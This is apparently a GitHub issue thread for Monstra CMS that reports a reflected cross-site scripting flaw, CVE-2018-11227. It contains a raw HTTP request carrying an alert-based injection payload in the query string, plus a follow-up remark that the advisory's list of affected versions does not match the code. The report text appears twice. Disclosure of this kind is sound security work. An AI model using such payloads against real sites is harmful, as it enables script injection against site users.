Open aberkdusunur opened 6 years ago
Hello team :)
I found xss at index page I reported to the cve platform, they let me use CVE-2018-11227, you can contact them for details
Request GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 Host: 192.168.1.106 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
Response
Just for the record:
https://www.exploit-db.com/exploits/44646 as well as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11227 mentions that this vulnerability affects "Version: before 3.0.4" while https://github.com/monstra-cms/monstra/compare/v3.0.3...v3.0.4 doesn't show any changes to the affected code parts causing this vulnerability:
https://github.com/monstra-cms/monstra/blob/master/storage/snippets/google-analytics.snippet.php#L9
https://github.com/monstra-cms/monstra/blob/master/libraries/Gelato/Url/Url.php#L95-L107
Hello team :)
I found xss at index page I reported to the cve platform, they let me use CVE-2018-11227, you can contact them for details
Request GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 Host: 192.168.1.106 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
Response